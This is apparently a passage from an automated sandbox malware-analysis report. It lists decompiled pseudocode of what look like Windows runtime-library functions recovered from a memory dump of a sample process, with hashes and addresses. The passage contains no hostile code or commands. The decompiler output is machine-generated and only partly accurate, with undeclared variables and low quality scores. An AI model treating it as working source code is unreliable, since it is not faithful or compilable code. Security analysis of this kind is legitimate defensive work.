                                                              0x00a83782
                                                              0x00a83787
                                                              0x00a83789
                                                              0x00a83790
                                                              0x00a83790
                                                              0x00a8378b
                                                              0x00a8378b
                                                              0x00a8378b
                                                              0x00a83792
                                                              0x00a83795
                                                              0x00a83795
                                                              0x00a83798
                                                              0x00a83798
                                                              0x00a8379b
                                                              0x00a8379b
                                                              0x00a291a3
                                                              0x00a291a9
                                                              0x00a291b0
                                                              0x00a291b4
                                                              0x00a291b4
                                                              0x00a291bb
                                                              0x00a291c0
                                                              0x00a291c5
                                                              0x00a291c7
                                                              0x00a837da
                                                              0x00a291cd
                                                              0x00a291cd
                                                              0x00a291cd
                                                              0x00a291d2
                                                              0x00a291d5
                                                              0x00a29239
                                                              0x00a29239
                                                              0x00a291d7
                                                              0x00a291db
                                                              0x00a291e1
                                                              0x00a291e7
                                                              0x00a291fd
                                                              0x00a29203
                                                              0x00a2921e
                                                              0x00a29223
                                                              0x00000000
                                                              0x00a29223
                                                              0x00a29205
                                                              0x00a29208
                                                              0x00a2920c
                                                              0x00a29214
                                                              0x00a29214
                                                              0x00a291e9
                                                              0x00a291e9
                                                              0x00a291ee
                                                              0x00a291f3
                                                              0x00a291f3
                                                              0x00a291f3
                                                              0x00a291e7
                                                              0x00000000
                                                              0x00a291db
                                                              0x00a29187
                                                              0x00a29168

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f7071a1f2cb0995bc67697ef1f969c6b6c2abc8f703d6cfe038028764250d3d
                                                              • Instruction ID: 2382c4904b26a80622d4e9584fccdf8df7947fcfa68b5b3493f3a7bd2c86d540
                                                              • Opcode Fuzzy Hash: 2f7071a1f2cb0995bc67697ef1f969c6b6c2abc8f703d6cfe038028764250d3d
                                                              • Instruction Fuzzy Hash: D4314671A00296DFDB61DFADD588BEEBBF1BF48B10F288269D40467251C734AD90CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A40050 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 53%
                                                              			E00A40050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0xb1d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E00A59ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E00A6B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E00AF8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E00A59702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0xb1b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                              0x00a40055
                                                              0x00a4005d
                                                              0x00a40062
                                                              0x00a4006c
                                                              0x00a4006f
                                                              0x00a40074
                                                              0x00a4007a
                                                              0x00a4007a
                                                              0x00a40080
                                                              0x00a40080
                                                              0x00a40087
                                                              0x00a4008d
                                                              0x00a4008f
                                                              0x00a40093
                                                              0x00a40095
                                                              0x00a4009b
                                                              0x00a400f8
                                                              0x00a400fb
                                                              0x00a400fc
                                                              0x00a400ff
                                                              0x00a40108
                                                              0x00a40108
                                                              0x00a400a2
                                                              0x00a400a6
                                                              0x00a400b3
                                                              0x00a400bc
                                                              0x00a400c5
                                                              0x00a400ca
                                                              0x00a8c01e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8c02d
                                                              0x00a400d5
                                                              0x00a400d9
                                                              0x00a8c03d
                                                              0x00a8c046
                                                              0x00a8c046
                                                              0x00a400df
                                                              0x00a400e2
                                                              0x00a400ea
                                                              0x00a400ef
                                                              0x00a400f2
                                                              0x00a400f6
                                                              0x00a40111
                                                              0x00a40117
                                                              0x00a40117
                                                              0x00000000
                                                              0x00a400f6
                                                              0x00a400d0
                                                              0x00a400d0
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c8639110daac3a953b6374a4e48d98ac53ed0e96a7186e745551db1ee3d880c7
                                                              • Instruction ID: 99e239e896477ff8d3f69c3338640e9b133d7f34993a083298438e0bef103d8f
                                                              • Opcode Fuzzy Hash: c8639110daac3a953b6374a4e48d98ac53ed0e96a7186e745551db1ee3d880c7
                                                              • Instruction Fuzzy Hash: 56318C35211B04CFD722CB28C941F96B3F5FF88714F14856DE99A87A90EB75AC01DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA6C0A Relevance: .1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00AA6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E00A47D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0xb17b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L00A44620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E00A6F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E00A47D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E00A69AE0();
						_t23 = L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                              0x00aa6c0a
                                                              0x00aa6c0f
                                                              0x00aa6c10
                                                              0x00aa6c13
                                                              0x00aa6c15
                                                              0x00aa6c19
                                                              0x00aa6c1c
                                                              0x00aa6c21
                                                              0x00aa6c28
                                                              0x00aa6c3a
                                                              0x00aa6c2a
                                                              0x00aa6c33
                                                              0x00aa6c33
                                                              0x00aa6c3f
                                                              0x00aa6c48
                                                              0x00aa6c4d
                                                              0x00aa6c60
                                                              0x00aa6c65
                                                              0x00aa6c69
                                                              0x00aa6c73
                                                              0x00aa6c79
                                                              0x00aa6c7f
                                                              0x00aa6c86
                                                              0x00aa6c90
                                                              0x00aa6c94
                                                              0x00aa6ca6
                                                              0x00aa6cb2
                                                              0x00aa6cbd
                                                              0x00aa6cbd
                                                              0x00aa6cc3
                                                              0x00aa6cc7
                                                              0x00aa6ccb
                                                              0x00aa6cd0
                                                              0x00aa6cd1
                                                              0x00aa6ce2
                                                              0x00aa6ce2
                                                              0x00aa6c69
                                                              0x00aa6ced

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d71793504de5b2e34d78893abb773dc08d2d47719754d4ad5a692a497de99110
                                                              • Instruction ID: e8877685fe0af8745e877c44a5a92ce300bd7b7f8597117be2b1f0c3a85cc578
                                                              • Opcode Fuzzy Hash: d71793504de5b2e34d78893abb773dc08d2d47719754d4ad5a692a497de99110
                                                              • Instruction Fuzzy Hash: 582197B1A00644AFC712DF68D980E6AB7B8FF49750F18006AF908CB791DB34ED10CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A690AF Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 82%
                                                              			E00A690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E00A7D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E00A5E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L00A44620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E00A6F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E00A5A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                              0x00a690af
                                                              0x00a690b8
                                                              0x00a690bb
                                                              0x00a690bf
                                                              0x00a690c2
                                                              0x00a690c2
                                                              0x00a690c8
                                                              0x00a690cb
                                                              0x00a690cd
                                                              0x00aa14d7
                                                              0x00aa14eb
                                                              0x00aa14eb
                                                              0x00000000
                                                              0x00aa14eb
                                                              0x00aa14db
                                                              0x00aa14e6
                                                              0x00000000
                                                              0x00aa14f2
                                                              0x00aa14e8
                                                              0x00000000
                                                              0x00aa14e8
                                                              0x00a690d8
                                                              0x00a690da
                                                              0x00a690dd
                                                              0x00a690e5
                                                              0x00000000
                                                              0x00a69139
                                                              0x00a690fa
                                                              0x00a690fe
                                                              0x00a69142
                                                              0x00000000
                                                              0x00a69142
                                                              0x00a69104
                                                              0x00a69107
                                                              0x00a6910b
                                                              0x00a69110
                                                              0x00a69118
                                                              0x00a69147
                                                              0x00a69148
                                                              0x00a6914f
                                                              0x00a69150
                                                              0x00a69151
                                                              0x00a69152
                                                              0x00a69156
                                                              0x00a6915d
                                                              0x00a69160
                                                              0x00a69168
                                                              0x00a6916c
                                                              0x00a691bc
                                                              0x00a691be
                                                              0x00000000
                                                              0x00a691be
                                                              0x00a6916e
                                                              0x00a69173
                                                              0x00a69176
                                                              0x00000000
                                                              0x00000000
                                                              0x00a6917c
                                                              0x00a69180
                                                              0x00a691b5
                                                              0x00000000
                                                              0x00a691b5
                                                              0x00a69182
                                                              0x00a69185
                                                              0x00a69189
                                                              0x00000000
                                                              0x00000000
                                                              0x00a6918e
                                                              0x00a69190
                                                              0x00a69198
                                                              0x00000000
                                                              0x00000000
                                                              0x00a691a0
                                                              0x00000000
                                                              0x00a691ad
                                                              0x00a691ad
                                                              0x00a691b0
                                                              0x00a691b1
                                                              0x00000000
                                                              0x00a69185
                                                              0x00a6911a
                                                              0x00a6911c
                                                              0x00a6911f
                                                              0x00a69125
                                                              0x00a69127
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction ID: 7441371154c982e7c8b859e1901201eb55cf607d5edf8849605638c44daaeb62
                                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction Fuzzy Hash: 2B218EB1A00205EFDB20DF59C944EAAF7FCEF58710F25896AE949A7240D330ED00CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A53B7A Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00A53B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0xb184c4; // 0x0
				_v12 = 1;
				_v8 =  *0xb184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L00A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0xb184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E00A6AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E00A6FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0xb184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0xb184c4; // 0x0
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                              0x00a53b89
                                                              0x00a53b96
                                                              0x00a53ba1
                                                              0x00a53bab
                                                              0x00a53bb5
                                                              0x00a53bb9
                                                              0x00a96298
                                                              0x00a53bbf
                                                              0x00a53bc2
                                                              0x00a53bc3
                                                              0x00a53bc9
                                                              0x00a53bca
                                                              0x00a53bcc
                                                              0x00a53bcd
                                                              0x00a53bd4
                                                              0x00a53bd6
                                                              0x00a53bdb
                                                              0x00a53bea
                                                              0x00a53bf7
                                                              0x00a53bfb
                                                              0x00a53bff
                                                              0x00a53c09
                                                              0x00a53c0a
                                                              0x00a53c0b
                                                              0x00a53c0f
                                                              0x00a53c14
                                                              0x00a53c18
                                                              0x00a53c18
                                                              0x00a53bfb
                                                              0x00a53c1b
                                                              0x00a53c30
                                                              0x00a53c30
                                                              0x00a53c3d

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc9cd2911850ef988c2811a9137ba67278998ff1d71b6a3aaa3978465ec8063d
                                                              • Instruction ID: 0ac5aee8e9c745ab7dbfa4c9d6c9c0e9fa1fef4cb37da00a66236081e6326eba
                                                              • Opcode Fuzzy Hash: fc9cd2911850ef988c2811a9137ba67278998ff1d71b6a3aaa3978465ec8063d
                                                              • Instruction Fuzzy Hash: 38219272A00105AFCB00DF98DE81B9AB7BDFF84748F154068E908AB251DB71EE05CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA6CF0 Relevance: .1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 80%
                                                              			E00AA6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E00A47D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E00A47D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0xa05c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E00A5F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E00A5F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E00AA7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L00A42400( &_v52);
								}
								_t21 = L00A42400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                              0x00aa6cfb
                                                              0x00aa6d00
                                                              0x00aa6d02
                                                              0x00aa6d06
                                                              0x00aa6d0a
                                                              0x00aa6d0e
                                                              0x00aa6d19
                                                              0x00aa6d2b
                                                              0x00aa6d1b
                                                              0x00aa6d24
                                                              0x00aa6d24
                                                              0x00aa6d33
                                                              0x00aa6d39
                                                              0x00aa6d46
                                                              0x00aa6d4f
                                                              0x00aa6d61
                                                              0x00aa6d51
                                                              0x00aa6d5a
                                                              0x00aa6d5a
                                                              0x00aa6d69
                                                              0x00aa6d6b
                                                              0x00aa6d6d
                                                              0x00aa6d6f
                                                              0x00aa6d6f
                                                              0x00aa6d74
                                                              0x00aa6d79
                                                              0x00aa6d7a
                                                              0x00aa6d7f
                                                              0x00aa6d82
                                                              0x00aa6d88
                                                              0x00aa6d89
                                                              0x00aa6d90
                                                              0x00aa6d94
                                                              0x00aa6da7
                                                              0x00aa6db1
                                                              0x00aa6db1
                                                              0x00aa6dbb
                                                              0x00aa6dbb
                                                              0x00aa6d90
                                                              0x00aa6d69
                                                              0x00aa6d46
                                                              0x00aa6dc6

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ffe935366ace32893e47bdb1d8056f0257f9e9e27a1f394f15262e67d680813
                                                              • Instruction ID: a3bd0989bc2ff0bc2ab0e7f26e75ac01871938e7142ab35822ffdaa023b21e60
                                                              • Opcode Fuzzy Hash: 0ffe935366ace32893e47bdb1d8056f0257f9e9e27a1f394f15262e67d680813
                                                              • Instruction Fuzzy Hash: 1121C572604B449FC711DF29CA44BABB7ECEF82780F080566F950C7291D734D908CAA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF070D Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 67%
                                                              			E00AF070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E00AF07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E00AEAFDE( &_v8,  &_v12);
					E00AF1293(_t38, _v28, _t60);
					if(E00A47D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E00AE14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                              0x00af071b
                                                              0x00af0724
                                                              0x00af0734
                                                              0x00af0738
                                                              0x00af074b
                                                              0x00af074b
                                                              0x00af0753
                                                              0x00af0753
                                                              0x00af0759
                                                              0x00af075d
                                                              0x00af0774
                                                              0x00af0779
                                                              0x00af077d
                                                              0x00af0789
                                                              0x00af0795
                                                              0x00af07a7
                                                              0x00af0797
                                                              0x00af07a0
                                                              0x00af07a0
                                                              0x00af07af
                                                              0x00af07c4
                                                              0x00af07cd
                                                              0x00af07cd
                                                              0x00af07af
                                                              0x00af07dc

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                              • Instruction ID: 6bd410399efeb9a2ed3189f34b2f5abd4d364f637fd047be3d89743d27a9a1cc
                                                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                              • Instruction Fuzzy Hash: C52104362046449FD715EF58C880F6ABBA5EFC4350F048569FA958B392D730ED09CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A4AE73 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 96%
                                                              			E00A4AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E00A47D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E00A47D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E00A47D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E00A47D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E00AA7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                              0x00a4ae78
                                                              0x00a4ae7c
                                                              0x00a4ae7e
                                                              0x00a4ae81
                                                              0x00a4ae86
                                                              0x00a4ae8d
                                                              0x00a92691
                                                              0x00a4ae93
                                                              0x00a4ae93
                                                              0x00a4ae93
                                                              0x00a4ae98
                                                              0x00a4ae9d
                                                              0x00a926a2
                                                              0x00a926b4
                                                              0x00a926a4
                                                              0x00a926ad
                                                              0x00a926ad
                                                              0x00a926b9
                                                              0x00000000
                                                              0x00a926bb
                                                              0x00000000
                                                              0x00a926bb
                                                              0x00a4aea3
                                                              0x00a4aea3
                                                              0x00a4aea3
                                                              0x00a4aeaa
                                                              0x00a926c0
                                                              0x00a926c9
                                                              0x00a926c9
                                                              0x00a4aeb3
                                                              0x00a926d4
                                                              0x00a926e1
                                                              0x00000000
                                                              0x00000000
                                                              0x00a926e7
                                                              0x00a926ee
                                                              0x00a926f0
                                                              0x00a926f9
                                                              0x00a926f9
                                                              0x00a92702
                                                              0x00a92708
                                                              0x00a92708
                                                              0x00a9270b
                                                              0x00a9270f
                                                              0x00a92711
                                                              0x00a92711
                                                              0x00a92725
                                                              0x00a92725
                                                              0x00000000
                                                              0x00a4aeb9
                                                              0x00a4aeb9
                                                              0x00a4aebf
                                                              0x00a4aebf
                                                              0x00a4aeb3

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                              • Instruction ID: 0d47eb8fe612b071dae947d5611336389d023f25d752215843650a60a46e5b1f
                                                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
